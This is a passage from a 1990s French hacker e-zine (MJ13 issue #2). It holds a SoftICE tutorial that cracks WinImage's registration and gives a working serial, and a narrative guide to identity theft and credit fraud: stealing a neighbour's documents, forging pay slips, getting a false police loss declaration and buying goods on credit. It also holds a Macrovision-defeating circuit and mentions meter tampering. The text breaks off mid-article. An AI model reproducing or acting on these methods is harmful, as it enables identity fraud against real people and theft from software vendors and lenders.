MM          MM       JJJJJJJJJJJJJJ           11      33333333333
       MMM        MMM             JJ               1111               33
       MM MM    MM MM             JJ              11 11              33
       MM  MM  MM  MM             JJ             11  11             33
       MM   MMMM   MM             JJ                 11         33333
       MM    MM    MM             JJ                 11             333
       MM          MM             JJ                 11               33
       MM          MM       JJ    JJ                 11      33       33
       MM          MM        JJJJJJ                  11       333333333



                                    ISSUE #2



I/  INTRODUCTION
2/  % DE PIRATAGE INFORMATIQUE [ALLIGATOR427]
3/  COURS DE CRACK 2 [SaMSoN]
4/  HACK DES SOCIETES DE CREDITS (THEME A) [ALLIGATOR427]
5/  BYE LA MACROVISION [MAD666]
6/  VOUS DEBUTEZ EN CRACK? QUE CHOISIR? DOS, WIN? [SaMSoN]
7/  INITIATION AU VIRUS [UnK MnemoniK]
8/  TROUVEZ DES WAREZ!!!! [Shybe]
9/  CDRWIN 3.0a, TRACAGE POUR REGISTRED [DONGLE KILLER, ALLIGATOR427]
10/ VIRUS, EXEMPLE! [UnK MnemoniK]
11/ VIRUS BATCH [DarK BirD (Special thank's)]
********************************************************************************

                                   INTRODUCTION

 nous avons creer cet e-mag pour diverses raisons, la principale
 etant de mettre nos connaissances (informatiques & autres) en commun, sur
 des sujets aussi divers que le Hacking, Phreaking, Virus, Crash, Anarchie,
 Crack & Programmation de tous les types. On en oublie surement certains..
 Ce mag se veut, se doit d'etre a tendance ultra liberaliste et +
 les fautes d'orthografes y sont volontaires ;-)
 On peut ecrire sur tout, de votre premier rapport avec un pc, aux hacks,
 phreak etc en passant par votre premier rapport sex avec votre elephant!
 on peut aussi construire des bombes, planter des fleurs, recreer la couche
 d'ozone, piquer des larfeuilles...
 on fait egalement ca pour envoyer un max de monde en prison! si!!!
 
 ------------------------------------------------------------------------------
 MEMBRES:       | Activité |
 -----------------------------------------------------------------------------

 ALLIGATOR427  / CREATEUR / REDACTION / CRACKER / COURRIER /
 PhaNToM       / CREATEUR / REDACTION / CRACKER / HACKER /
 MAD666        / CREATEUR / REDACTION / HACKER / COURRIER /
 SaMSoN        / CREATEUR / REDACTION / CRACKER / DIFFUSION /
 UnK MnemoniK  / REDACTION / VIRUS / 
 JLB53         / REDACTION / CRACKER /
 DONGLE KILLER / REDACTION / CRACKER / PROGRAMMATION PASCAL, DELPHI, ASM.
 SHYBE         / REDACTION / CRACKER / DIFFUSION / RECHERCHE FTP /
 NECROMANCER   / RECHERCHE WAREZ /
 RANDALL FLAG  / CRACKER /
 BLURPY        / RECHERCHE WAREZ /
 Mister WIL    / CRACKER / DIFFUSION / 
 SKELETOR      / RECHERCHE WAREZ /
 
 Un Welcome special a UnK MnemoniK, de la part de tous.
 Special Thank's a DaRK BiRD, pour sa participation & article.

 _____________________________________________________________________________
 SITE:
                www.mygale.org/08/samson/
                www.mygale.org/01/mister/
                www.mnet.fr/maraga
                www.toptown.com/HP/mj13
 COURRIER:
                alli427@hotmail.com
 -----------------------------------------------------------------------------

 MJ13 ne saurait etre tenu responsable de l'irresponsabilité de ces auteurs
 par leurs articles ecris, verifiés ou pas, et des problemes qui pourrait
 s'en suivre pour vous, lecteurs.
 nous ne serions etre tenus responsables des causes de la lecture & mise
 en application des articles ci dessous. Vous savez tous quel procedure
 employé pour voler dans un supermarché, et vous ne le faites pas pour
 autant! il est evident que ces articles ont été ecris dans un but d'etude,
 evitez de prendre ca comme un aller direct a la prison de votre departement.
 a priori, nous acceptons tout articles traitant de h/p/c/c/a/v, et meme les
 autres. en aucun cas des articles de themes d'ethique racial ne saurait etre
 tolérés et admis. si vous voulez casser du noir, ecrivez a Le Pen et pas a
 nous. toutes personnes faisant partie de notre groupe se doit d'ecrire des
 articles signées, et de ne divulguer son identité a quiconque,
 pour quelques raisons que ce soit. L'identité des personnes participant
 a cet e-mag doit rester confidentiel, afin de s'auto proteger, et de rester
 .../ Virtuels?\...
 Vous ne faites pas partie du groupe et souhaitez nous envoyer des articles,
 nous poser des questions, nous critiquer? 
 ALLEZ-Y!!! vos articles seront lus, soumis a divers menbres & diffusés si
 jugés intéressant... vos courriers seront traités avec SOINS, et nous vous
 repondrons soit par mail, soit par diffusion dans notre rubrique questions/
 reponses.
 Vous pouvez egalement vous enregistrer pour recevoir l'issue #3 des sa sortie
 a l'adresse courrier MJ13: alli427@hotmail.com
 MJ13 est un magazine de libre diffusion, a but non lucratif, et donc gratuit.
 Nous vous invitons a le diffuser au maximum. Bonne lecture.
 ------------------------------------------------------------------------------
 WANTED: Articles programmation, cours C, C++, PASCAL..., articles a themes A..
 ------------------------------------------------------------------------------
 Voici donc l'issue 2.0, qui n'etait plus attendu!!!!

                                                   ALLIGATOR427 & MAD666


********************************************************************************
			| % DE PIRATAGE INFORMATIQUE |
			|	     PAR             |
			|       ALLIGATOR427         |
********************************************************************************
ALLIGATOR 427 au cerveau de jade et d'argent. je mouche mon nez, r'monte
mes chaussettes, je vous attends.
*********************************H.F.T******************************************

                        
Juste histoire de voir comment notre cher pays est placé par rapport au
piratage logiciels informatique...




PAYS              Pourcentage de Piratage:
--------------------------------------------------------
Allemagne                 71%
Australie                 45%
Belgique                  66%
Espagne                   87%
Etats Unis                39%
France                    83% (c'est pas mal du tout nan?)
Italie                    86%
Japon                     96%
Singapour                 43%
Suisse                    60%
Taiwan                    93%
Thailande                 99%            
Pole sud:                 0%
     Source: Business Software Alliance, Basés sur un rapport de
                      Novembre 1996
                    
                                                ALLIGATOR427 / MJ13

********************************************************************************

                       +------------------------------+
                       ¦ Initiation au crack, cours 2 ¦
 +---------------------¦             par              +---------------------+
 ¦                     +-------SaMSoN-[Mj13/Dsk]------+                     ¦
 ¦                                                                          ¦
 ¦                    "Messieurs les mecs des ministères                    ¦
 ¦                     En meme temps que vos impots                         ¦
 ¦                     Vous pouvez faire monter vos bieres                  ¦
 ¦                     Y'en a marre !"                                      ¦
 ¦                                             Leo Ferre                    ¦
 ¦                                                                          ¦
 ¦                     +------------------------------+                     ¦
 ¦                     ¦ 1. Introduction              ¦                     ¦
 +---------------------¦ 2. Des Breakpoints...        +---------------------+
                       ¦ 3. Winimage 2.20: le serial  ¦
                       ¦ 4. Les Credits de Mr. SaMSoN ¦
                       ¦ 5. Contactez moi!            ¦
                       +------------------------------+



                                                       
 +-----------------+                                                       
 ¦ 1. Introduction +---------------------------------------------------------
 +-----------------+ 

    Dans le premier cours, nous avons fait une approche de Winice, en presen-
 tant rapidement les fonctions de bases. Nous avons egalement fait un crack
 simple de la boite de dialogue a l'entree de Winimage 2.50, en detaillant la
 marche a suivre de A a Z. Je vous avait promis de vous montrer comment trou-
 ver le serial qui correspond a votre nom... Malheureusement, j'ai pomme la
 version 2.50 (saint bordel de mon disque dur :)... Je vais donc faire cette
 lecon avec la version 2.20, largement repandue dans les CD-Rom (ou cederom:)
 fournis avec les revues... Malgre tout, le programme, en ce qui concerne
 la procedure d'enregistrement, est le meme pour les versions 2.20, 2.50 et
 3.0 de Winimage. Seuls les offsets changent. Ainsi, le serial realisé avec
 Winimage 2.20 fonctionnera avec les versions ulterieures...
   Avant d'attaquer le serial de Winimage, je vous ferai d'abord une presen-
 tation generale du principe des breakoints sous Windows.
   NB: Vous pouvez egalement consulter des tutoriaux en Anglish, le plus se-
 rieux etant a mon sens celui de +ORC (cherchez "Fravia" avec un moteur de
 recherche sur le Web)

 +-----------------------+
 ¦ 2. Des Breakpoints... +---------------------------------------------------
 +-----------------------+

    Pour pouvoir debugger des softs sous Windows, les Breakpoints sont essen-
 tiels. Il s'agit de "points d'arrets" dans le deroulement d'un programme. En
 effet, si vous lancez Winimage (ou tout autre soft Windaube) et que vous u-
 tilisez le Breakpoint de base Ctrl-D, Winice apparait mais vous n'etes cer-
 tainement pas dans le code source de Winimage, mais quelque par dans les
 procedures de Windows: l'inconvenient du multitache...
    On peut (et doit) donc poser des Breakpoints (BP) sur un offset precis du
 code source (BPX xxxx:xxxxxxxx ou bien F9 apres avoir mis le curseur sur
 l'offset vise) ou bien encore sur des procedures de Win95. En effet, les
 softs programmés pour Windows utilisent de nombreuses fonctions proposees
 par Windows. Ainsi on peut poser des BP sur les boites de dialogues (BPX
 DIALOGBOXPARAM) ou bien sûr les "messagebox" (BPX MESSAGEBOX) mais sur
 bien d'autres fonctions (BPX CREATEMENUITEM......) Il m'est impossible de les
 citer tous, a vous (et a moi) d'en decouvrir d'autres jours apres jours...
    On peut egalement en poser sur un offset memoire (BPMB xxxx:xxxxxxx) ou
 sur des interruptions (BPINT) ou sur ce qui sort par le port paralelle (BPIO)
    Vous le comprenez aisement, trouver le BP efficace n'est pas toujours
 chose facile.



 +-----------------------------+
 ¦ 3. Winimage 2.20: le serial +---------------------------------------------
 +-----------------------------+

    On lance donc Winimage, et la boite de dialogue d'enregistrement (opti-
 ons-|'enregistrement). On entre un nom et un serial bidon (pour moi: "Samson
 [Mj13] et 12121212 comme serial).

    La, on va utiliser un BP assez complexe. Il s'agit en effet d'arreter le
 soft apres avoir valide le nom et le serial avec OK mais avant d'avoir le
 message qui nous indique que le serial entre est incorrect.


    On fait donc "surgir" (attention, c'est violent :) Winice avec Ctrl-D...
 La, on va chercher le nom de la "task" pour Winimage. Il s'agit du nom uti-
 lise par Windows95 pour le deroulement de Winimage. On entre donc l'instruc-
 tion "task":

 TaskName---SS:PP------StackTop--StackBot--StackLow-TaskDB--hQueue--Events
 Winimant   0000:0000  0066D000  00670000           1BBE    0A8F    0000
 Winshade   0000:0000  0066E000  00670000           190E    2817    0000
 Impwm      0000:0000  0069D000  006A0000           1A56    19CF    0000
 Explorer   0000:0000  0066C000  00640000           1B86    1B37    0000
     Any Key To Continue, Esc To Cancel

   On voit donc les differents taches qui tournent sur mon systeme. Celle qui
 nous interesse, c'est "Winimant". On note simplement le nom.


   On execute maintenant l'instruction "Hwnd Winimant", pour avoir le detail
 des boites de dialogues "en route" avec Winimage:

 Window-Handle---HQueue--SZ--QOwner----Class Name---------Window-Procedure
 02B8(1)         0A8F    32  WINIMANT  #32770 (Dialog)    078F:00004757
  02BC(2)        0A8F    32  WINIMANT  Static             078F:000052FA
  02C0(2)        0A8F    32  WINIMANT  Edit               079F:00000BF4
  02C4(2)        0A8F    32  WINIMANT  Static             078F:000052FA
  02C8(2)        0A8F    32  WINIMANT  Edit               078F:00000BF4
    Any Key To Continue, Esc To Cancel

   Cette instruction nous montre donc la composition de la boite de dialogue
 selectionnee:
     - la "fenetre maitresse" dont le Window Handle est suivi de (1) et ses
       composants, suivis de (2).
     - Le class name "Static" designe tout ce qui peut etre ecrit
       ("Nom:";"Serial:")
     - le class name "Edit" designe les zones de saisie, "Static" qui designe
       les zones de texte non-editables, etc...
   On note le Window Handle de l'une de ces zone de saisie, 02C0 par exemple.

   On a enfin tous les elements pour poser un BP correct:
 "BMSG 02C0 WM_Gettext"
   On relance donc le deroulement de Winice avec la touche F5, et l'on valide
 le nom et le serial entres en cliquant sur "OK". Rapidement, Winice apparait
 on va enfin pouvoir commencer a tracer dans Winimage.


   La, il faut faire du "trace over" avec la touche F10, comme un taré, jus-
 qu'a ce que la boite de dialogue nous indiquant "Donnees incorrectes" appa-
 raisse. Quant celle-ci est validee, on a le code suivant sous les yeux:

 xxxx:0040A500  CALL    0040D335 <--- Test du serial
 xxxx:0040A505  ADD     ESP,08
 xxxx:0040A508  XOR     ECX,ECX
 xxxx:0040A50A  MOV     [00421024],EAX
 xxxx:0040A50F  TEST    EAX,EAX  <--- Si EAX different de 0
 xxxx:0040A511  JNZ     0040A53F ------+ Alors Code Faux
 xxxx:0040A513  MOV     EAX,00000001   ¦ Sinon Bon
 xxxx:0040A518  PUSH    00002000       ¦
 xxxx:0040A51D  PUSH    0000042D       ¦
 xxxx:0040A522  MOV     [00420C30]     ¦
 xxxx:0040A527  PUSH    0000042B       ¦
 xxxx:0040A52C  MOV     [00420B8C],EAX ¦
 xxxx:0040A531  MOV     [00420B78],CL  ¦
 xxxx:0040A537  MOV     [00420E28],CL  ¦
 xxxx:0040A53D  JMP     0040A55A       ¦ Saut vers: "Code bon"
 xxxx:0040A53F  XOR     EAX,EAX  <-----+ Debut de la procedure "Faux serial"
 xxxx:0040A541  PUSH    00002000
 xxxx:0040A546  PUSH    0000042D
 xxxx:0040A54B  MOV     [00420C30],EAX
 xxxx:0040A550  PUSH    0000042A
 xxxx:0040A555  MOV     [00420B8C],EAX
 xxxx:0040A55A  PUSH    ESI
 xxxx:0040A55B  CALL    0040EB84 <--- Execute la boite "Donnees incorrectes"
 xxxx:0040A560  ADD     ESP,10
 xxxx:0040A563  PUSH    00

   En traçant comme un fou, on arrive sur le Call de l'offset 0040A55B. Quand
 on l'execute, la boite de dialogue "Donnees incorrectes" apparait. Il faut
 maintenant essayer d'analyser le code alentour.

    - On repere a l'offset 0040A53D un JMP inconditionnel. La procedure "Faux
 serial" commence donc a l'offset d'apres: 0040A53F.
    - On cherche donc un saut conditionnel qui renvoie vers cet offset.
    - On le repere pas tres loin:
        xxxx:0040A511  JNZ     0040A53F
    - Peu avant ce JNZ, on repere un
        xxxx:0040A500   CALL 0040D335;

   Il y a 95% de chances pour que ce soit ce CALL qui verifie si le serial
 est bon. On pose donc un BP sur ce call. Deux solutions pour ca:
   - placer le curseur sur l'offset vise et appuyer sur F9.
     (Je rappelle que la touche F6 permet de passer de la zone "Edit" de
     Winice a la zone "Code")
   - faire un "BPX 0040A500"
 Les deux ont un resultat equivalent.
 On remet Winimage en marche avec Winice (F5).


   On relance la boite de dialogue d'enregistrement. Comme tout a l'heure,
 on rentre des donnees bidons qu'on valide avec OK. La,Winice apparait a cau-
 se du BP place plus haut. On n'en a plus rien a foutre.
    [Petite paranthese: la commande BL vous donne la liste des Breakpoints.
    Vous pouvez en effacer (BL) en desactiver (bd xx) puis les reactiver
    (be xx)].
   On continue avec F5, jusqu'a ce que Winice s'arrete sur l'offset 0040A500.
 On "rentre" dans le CALL  avec F8.


   La, on entre vraiment dans la phase de recherche du serial... Je ne vais
 pas m'amuser a vous retranscrire toute la procedure. Je vais donc vous si-
 gnaler les offset interessants.
   Au fur et a mesure que l'on trace on essaye d'abord de reperer les ins-
 truction du type "PUSH WORD PTR [EBP+08]" et "LEA ECX,[EBP-14]" (bien enten-
 du, les valeurs ne sont citees qu'a titre d'exemple).

   Au debut de la procedure, on a l'instruction suivante:
 xxxx:0040D34B  PUSH    DWORD PTR [EBP+08]
      En haut de l'ecran Winice m'indique (ce sera different pour vous):
      SS:0066F664=00420E28
      Donc, je fais un "D 00420E28" pour afficher le contenu de cet offset.
      Et winice m'affiche "Samson [Mj13]" le nom entre pour l'enregistrement.
 xxxx:0040D358  LEA     ECX,[EBP-14]
      Je fais un "D EBP-14" cd qui nous donne le serial bidon
 xxxx:0040D35B  LEA     EAX,[EBP-28]
      Un "D EDP-28" ne nous donne pas grand chose. Mais, on a deja eu le nom,
      le serial bidon. Tout porte a croire que le bon serial sera "case" dans
      cet offset. On garde donc un oeil dessus.

 xxxx:0040D361  CALL    0040D2E7
      Apres avoir execute ce CALL, l'offset [EBP-28] se modifie et nous donne
      "2D3A0D60". Cela ressemble a un serial. Mais nous ne somme qu'au debut
      de la procedure et il ne s'agit probablement que d'une etape interme-
      diaire.
 xxxx:0040D395  CALL    0041B8D8
      Nouvelle modification de [EBP-28]: "413F26AB"
 xxxx:0040D3B7  CALL    0040D2E7
      Nouvelle modification de [EBP-28]: "44402684"
 xxxx:0040D3E0  CALL    0040D2E7
      Nouvelle modification de [EBP-28]: "3D3F26E1"
 Nous n'avons, ensuite pas d'autres modifications de cet offset...

   On relance donc la procedure d'enregistrement avec exactement le meme nom
 que precedemment et ce que l'on pense etre le serial (pour moi:3D3F26E1)
 Et... Ca marche!

 Donc, pour moi:
 Nom: Samson [Mj13]
 Serial: 3D3F26E1

   Bon, c'est pas forcement evident a expliquer, alors je ne sais pas si j'ai 
 toujours ete clair. Mais, en vous accrochant, ca devrait passer. Quand vous
 aurez fait ce crack, essayez-vous sur le serial de Winzip, la procedure est
 assez semblable.



 +-----------------------------+
 ¦ 4. Les credits de Mr Samson +---------------------------------------------
 +-----------------------------+ 
   Un grand salut a:
 Dsk (Snem, Spanik, Dark Angel...), contactez nous: www.mygale.org/11/snem

 F-Kaos (Cassio-P, Crifalo), Piracy.Fr

 Tous ceussent qui trainent sur #Warez-France:
  Ofx, Loginz, Mht, Capitaine, Godfroy, Hocus, Betty3D, etc...
 Unknown Mnemonic (bienvenue chez nous) [NDLR:voir son article sur les virus.]

 Vous qui trainez dans la salle d'info de la fac :)

 ET BIEN SUR LES MEMBRES DE MJ13
 
        -= Et a tous ceux qui font bouger la scene francophone!!! =-


 +-------------------+                                                       
 ¦ 5. Contactez moi! +-------------------------------------------------------
 +-------------------+ 
 E-mail: samsondsk@hotmail.com (plus d'e-mail massons@xiii.univ-angers.fr :)
 Ma page Web pour trouver mes cracks, des outils,le dernier Mj13...
   http://www.mygale.org/08/samson/
 Sur Irc: Channel #Warez-France ou #Warez_France
   Nick: Samson ou {Samson}

   Je recherche egalement des pages Web qui luttent contre le fascisme en
 France pour une prochaine section de ma page et bien sur, si vous avez une
 page Web "underground" francophone, n'hesitez pas!


                                                        +-------------------+
 -------------------------------------------------------¦ Samson [Mj13/Dsk] ¦
                                                        +-------------------+

*******************************************************************************
                        | HACK DES SOCIETES DE |
                        |       CREDITS        |
                        |         PAR          |
                        |     ALLIGATOR427     |
*******************************************************************************
 ALLIGATOR 427, au long regard phosphorecent, aux ailes de cachemire safran,
 je grille ma derniere cigarette, je vous attends...
 Je sais que desormais vivre est un calembour, la Mort est devenu un etat
 permanent, le monde est un Phantom, aux hyenes &.. aux vautours...
*******************************H.F.T*******************************************

Ca y est... J'ai reculé mon compteur. E.D.F est venu relevé les nouveaux
numéros, et ils ont plongé!!! Fabuleux! Me voici avec une facture de 800 balles
pour 6 mois. Correct! Ca s'arrose. 2721eme cuite... Ca aussi ca s'arrose...
Un double arrosage! Putain de cuite, ca remonte! il est 20h et j'suis deja
bourré. Faut que j'reste debout, j'ai un rencard avec la voisine du troisieme
a 22h. Dans l'attente, j'vais cracker un p'tit logiciel, voir si les cours de
SaMSoN sont bien clair, ou s'ils sont comme moi. C'est a ce moment precis
que le drame se produisit! Je m'eclate la tronche sur mon PC! Haaaa...
l'ecran fume, ho, pute de vierge! l'unité centrale aussi. j'suis dans la
merde, tout est cramé. Il m'faudrait un nouveau pc! et ce rapidos!
Reflechissons: Une fois payer ma facture EDF, mes clopes, la bouffe pour
le mois, il me restera entre 400 et 430 balles! genial! Aucun doute, c'est
pas avec ca que j'vais m'payer une becane! Quand au credit, en suplement
d'etre au chomdu depuis 7 ans (et pourtant je cherche), on a meme pas payer
la telé! On a trouvé un compromis et j'leur file 100balles par mois, mais
jamais il ne m'en accorderont un autre... Putain, si j'avais pus changer
d'identité quelque heures. Mais ca..
Quoi-que... Une idée enflamée vient de me rentrer dans la tete, etre  un autre
que moi... ouais. Mais qui? vaut mieux que j'prenne une personne que j'connais
mais qui risque pas de faire le raprochement avec moi. QUI??? vite, une biere,
ca m'aidera a penser, puis tt facons j'ai decuité.. Tiens, j'vais m'calmer..
3 valium! au diable l'avarice...
20h40: tjrs pas de cible..
20h50: mon rencard approche.. son mec part bossé a 22h00, ma femme se pieute
a 21h00, tu parles, on s'eclate!
son mec, tu parles d'1 con! Agent de securité qu'il est.. il s'l'a joue rambo
tandis que j'm'envoie sa femme..., la j'rigole!!
21h10: son mec... il m'connait a peine. bonjour dans l'escalier, par contre,
moi j'connais tout sur lui. Voila une cible potentiel!
21h30:je dresse une strategie: Je reste chez la gonzesse, et quand elle dort
je fouine. faut trouver une piece d'identité a lui, un bulletin de salaire,
une quittance de loyer ou EDF, un RIB et ca devrait coller.
21h45:1 autre biere..
22h00: un oeil par la fenetre, sa bagnole est plus la.. Je monte.
salut beauté, seul?
elle se jette sur moi et... j'vous passe les details, non mais!
22h33, l'affaire est bouclé, fallait qu'ca speed, et j'ai autre chose a penser
elle dort pas encore! bon, ben, j'vais l'interroger comme si de rien etais.
Tu t'en sors financierement? t'as des credits? et ton mec, il en a? il t'aide?
juste un pour la bagnole, juste 1 credit.. endorts toi.. j'vais pas lui
chanter une berceuse qd meme!
23h30: ca y est!! si!! elle pionce! allez go, au boulot.
j'me leve en douceur, et hop, dans la cuisine. au mur un truc en pendant avec
inscrit "PAYER" et "A PAYER". ca simplifie la tache ca.. dans les payer:
une facture de telephone, la redevance telé, EDF!!! ha! elle a eté payé y'a
un mois. zzou, dans la poche, j'la r'mettrais d'main! Y'a aussi un relevé
de compte qui fera office de RIB, j'aurais pus l'piquer au courrier m'enfin
j'suis pressé (de finir ce putain d'article!)
direction la salle, j'ouvre un premier placard, rien.. un second et hop,
dans une pochette rouge, les bulletins de salaire! et hop, le dernier, et
pendant que j'y suis j'vais meme prendre les 3 derniers + un bulletin dans
les premiers. des photocop et ca ira.. (j'tiens a preciser qu'on peut faire
des bulletins de salaire soi meme, en reprenant les cotis. sociales, que
l'URSAFF se fera un plaisir de vous donner, prenez aussi le num de SIRET
pour refaire un tampon en vitesse... les dates, des fois ou on telephonerais
a la boite, on est jamais assez prevoyant)
Maintenant, une piece d'identité...
dans le couloir, au porte manteau, y'a 2 blousons a lui..
Allez, j lui fais les poches! Paf, ca n'aurait su rater, pas de permis de
conduire mais une piece d'identité. Crayon, papier et j'note:
nom, prenom, date de naissance, n°de la piece...
celle la, j'peus la remettre.. j'ai tout ce qui me faut.
0h50: je redescends me coucher...
9h10: reveil.. les gosses a l'ecole, la femme j'sais pas ou.. pour moi c'est
une bonne journée qui commence.
une biere! Hey, c'est la premiere! pas de commentaires!
une douche, un coup de rasoir, des fringues propres et il est deja 10h30.
bus pour me rendre a une boutique ou l'on fait des photocopies seul.
1f60 et voila mes bulletins de salaires, en meilleurs etats que les originaux.
j'vais les chiffoner un poil. voila, maintenant elle sont plus ressemblante!.
il est midi.. j'vais boire l'apero.
15h00: sortis du bar.
15h10: direction le commisseriat central de ma p'tite ville: TOULON
j'entre..
-monsieur? m'interpelle t'on.
-oui, excusez moi mais j'ai un petit probleme, j'ai perdu mon portefeuille, et
je me trouve sans piece d'identité ni permis, c'est ennuyeux.
-Nous allons vous faire remplir une declaration de perte, ca fera office de
piece d'identité ou permis pour 2 mois.
-ha, ouf, vous ne pouvez imaginez combien vous me rendez service.
-mais nous sommes la pour ca.. (menteur qu'ils sont!)
je remplis donc cette declaration de perte, il va sans dire que j'ai appris
par coeur le nom, prenom & date de naissance de mon cher voisin.
arrive le moment ou on demande le numero des pieces...
alors la, je sors mon papier ou c'est noté et j'inscris..
(ca marche aussi sans le numero!)
je lui remets tout ca, lui demande de me la tamponner, en cas ou on prendrais
ce papier pour un faux(je demande pour faire lm'ignorant! il tamponne
toujours!). il le fait, et, adieu & merci! sisi, ca se passe comme ca!
me voila donc avec tous les papiers necessaires au credit.
j'commence a etre pressé vu l'heure, et il me faut un magasin style supermarche
ou grosse surface avec meubles et tout.. un petit magasin se rapellerait trop
facilement de mon visage. je choisis conforama, et m'y rends en taxi.
voila l'utilisation ingenieuse de mes 400balles de fin de mois..
j'y entre. mon coeur cogne.. et si ca foire??? qui ne tente rien n'a rien
et j'y tiens a prendre un nouveau pc. rayon informatique. la j'y connais plus
rien en informatique, j'laisse un vendeur me faire son baratin.. faut surtout
pas que je prenne la plus grosse becane, avec scanner, imprimante etc..
j'vais meme prendre la promo a 9 990f. je reste un peu sceptique au baratin
du vendeur, mais il croit me trainer dans la farine et hop! l'affaire se
conclut. arrive enfin le mode de paiement. je sors: a credit... 
et la il me cite: 1 piece d'identité, 1 rib, vos 3 derniers bulletins de sal-
aires, et une quittance loyer, facture telecom, edf...
j'ai tout dans ma poche, j'lui sors avec la declaration de perte...
la il regarde ca.. et moi j'lui explique que j'ai perdu mes papiers et que
je sors du commissairiat etc, etc..
il a pas envie de perdre son pourcentage, donc il accepte le tout..
quand il me demande combien d'apport cash je fais, je prends un air surpris,
et lui dis tres gentiment que je pensais qu'il n'y avait rien a payer au depart
(vous pouvez aussi lui filez 500f, ca passe mieux).. il pose tout un tas de 
question, montant de loyer, nombre d'enfant a charge etc... j'connais l'voisin,
le loyer? j'le descends de 500 balles, enfant? y'en a pas! etc...
10mn sur minitel et voila..
il vous dis que c'est bon.. normalement...
je rentre, allume mon nouveau pc,oublie la voisine, ma femme et me fais arreter
6 mois plus tard, au cours de mon arrestation,ca se passe mal, et j'tue 1 flic
avec un ecumeur, j'suis jetter dans une cave avec des grilles sur une fenetre
en aglomaré, et c'est de la que j'vous raconte ca... plus que 20 ans a tirer,
a defaut de la voisine...

Bon, j'ai abrégé, mais l'idée de base y est, et sachez que ca marche, j'espere.
j'avais le choix entre ca, ou des cours d'asm! mais sans pc, pas de possibilité
de cours!!! alors... J'ai abregé disais-je, lisez entre les lignes...
cherchez pas une voisine au troisieme... j'ai voulu par cet article, trouvez
et expliquez une faille de plus de notre systeme. Bien que, je me repéte,
la technique de base est bonne et fonctionne, je l'ai deja vu faire,
je ne me tiens en aucun cas responsable de vos actes et test.
Quand a moi, je n'habite pas TOULON, et n'ai pas de voisine au troisieme.
Je remercie le commissairiat de TOULON ainsi que les magasins CONFORAMA
pour leur aimable collaboration!!

PS: Si je mourrais enfermé suite a cet article, je ne veux en aucun cas etre
mis en biere.. non.. Quand le pinnochio baveux poussera ma brouette a Lancoux
j'veux qu'on m'degaze au gin/Sinthol, dans une piole de Jonnhy Walker, a la
Vodka d' chez warold; avec du Tomato campell!!! J'veux qu'on m'serve un apero,
si possible un double zero, afin de rencontrer Blanche Neige, et de fumer
un des sept nains!.. je compte sur vous..



Je recherche a peter tous sites pedophiles! Fuck a tous les pedophiles!!!
pour me contacter: ecrire au courrier...

				ALLIGATOR427 / MJ13

	ALLIGATOR 427, au souffle d'or et de diamant, je sais que vous etes
fin pret, je vous attends. Je sais que tu as la beauté destructive et 
le sourire vaincu comme un dernier soupir, tu sais que nos enfants s'appeleront
Vers de terre... 'hft'
						A ma Femme.

Je sais que vos machoires distille... l'agonie, a chaque parole!...'hft'
						A Vous tous...

********************************************************************************


*******************************************************************************
MACROVISION ,ou comment "cracker" les cassettes videos.         Par MAD666
*******************************************************************************
Fichiers additionnels:MVISION1.GIF: implantation des composants.
                     MVISION2.GIF: Shéma circuit imprimé double-faces (200dpi) 


     Voilà enfin ce sujet tant attendu par certains membres du groupe.

Historique: Depuis une 10ène d'années,les fabriquants/dupliqueurs de cassettes
 ont étés confrontés à un problème:Le Piratage. Aprés de nombreuses études par 
 des ingénieurs/électroniciens,ils trouvairent un moyen de protection contre ce
 piratage,ce qui,à priori,et a forciori aussi ;-),parraissait materiellement
 impossible à faire au depart sans électronique spécialisé dans les
 magnetoscopes. Il fut mis au point differents systemes,chacun propres à chaque
 fabriquants/dupliqueurs. Il se posa alors un probleme:Chaque magnetoscope
 n'etant pas adapté spécifiquement à chaque systemes,cela rendait tout simplem-
 -ent illisible certaines cassettes sur certains modèles de magnétoscope !!!
 Vers 1995,il fut décidé d'un systeme unique de protection pour tout les
 fabriquants/dupliqueurs,et ce,en collaboration avec les fabriquants de scopes
 afin de rendre la protection totalement transparente pour l'utilisateur,et
 pour quelle soit le plus fiable possible.

Procédé: La macrovision est un pocédé relativement simple qui joue entre la
 synchronisation des 2 scopes relier entre eux. En résumant rapidement :
 On insère des lignes de synchro avant le signal image,ce qui a pour efait,
 lors d'une copie,de ne pas copier ces lignes convenablement sur le scope de
 destination,et donc,de rendre la copie quasi illisible (sottement de l'image,
 spot lumiere ...) En jouant sur la synchro verticale d'un moniteur,on peux
 visualiser ces lignes indésirables en baissant l'image vers le bas.il
 apparrait alors,en haut,des lignes de synchro qui ne devrait plus etre là
 si on veux pouvoir copier les cassettes ...

Remède: Un petit circuit electronique à inserer entre l'entrée et la sortie
 SCART des 2 scopes,qui permet,tout simplement,d'effacer ce signal indesirable.
 Ce petit circuit ne vous coûteras gère plus de 300F et rend toute protection
 inéfficace (la copie elle-même peux ensuite être recopiée à l'infini sans ce
 boitier). Ce circuit ce compose de quelque composants facile à trouver (à
 part 1 ou 2 un peu plus difficile),d'un circuit imprimé double-faces
 (dimension:75mm*67mm voir MVISION2.GIF à imprimer (scanné a 200 dpi)).
 Il possède une entrée et une sortie SCART où il faudras y brancher 
 respectivement la sortie du scope lecteur et l'entrée du scope enregistreur.
 Pour savoir à quel fil correspond le signal entrée ou sortie SCART,voici un
 petit shéma d'une fiche SCART (aussi appelée fiche PERITEL):

             +-----------------------------\
             ¦ 1 3 5 7 9 11 13 15 17 19 21  \
             ¦  2 4 6 8 10 12 14 16 18 20    \
             +--------------------------------\

 Voilà,en gros ;-) une fiche PERITEL .
 L'ENTRéE SCART est la broche N°20 et la SORTIE la N°19

 Pour alimenter ce circuit,il vous faudras 2 alimentations. L'une de 5 volts,
 l'autre de 12 volts. La consomation du circuit ne doit gère depasser les
 150 mA .Vos alims doivent êtres stables et bien regulées 
 Un conseil au cas ou vous auriez du mal à trouver un ou plusieurs composants
 chez le cremier de votre ville : potassez les pubs des revues electronique
 et commandez les en VPC (à Paris,y'a tout normalement !)

Liste des composants:

  U1 : LM1881 Sync seperate
  U2 : 74HC4538
  U3 : 74HC02
  U4 : 74HC4316                  C1 : 1.5n  Silver Mica
  Q1 : 2N3904                    C2 : 2.2n  Silver Mica
  R1 : 300 Kohms                 C3 : 4.7y  Polyester (important !)
  R2 : 390 Kohms                 C4 : 100n
  R3 : 75 ohms                   C5 : 100n
  R4 : 620 ohms                  C6 : 560p
  R5 : 680 Kohms                 C7 : 47y
  R6 : 1 Kohms                   C8 : 220p
  R7 : 10 Kohms                  C9 : 100p
  R8 : 10 Kohms                  C10 : 1000y
  R9 : 120 ohms


Voilà que ce termine ce seul et unique article sur le façon de virer la
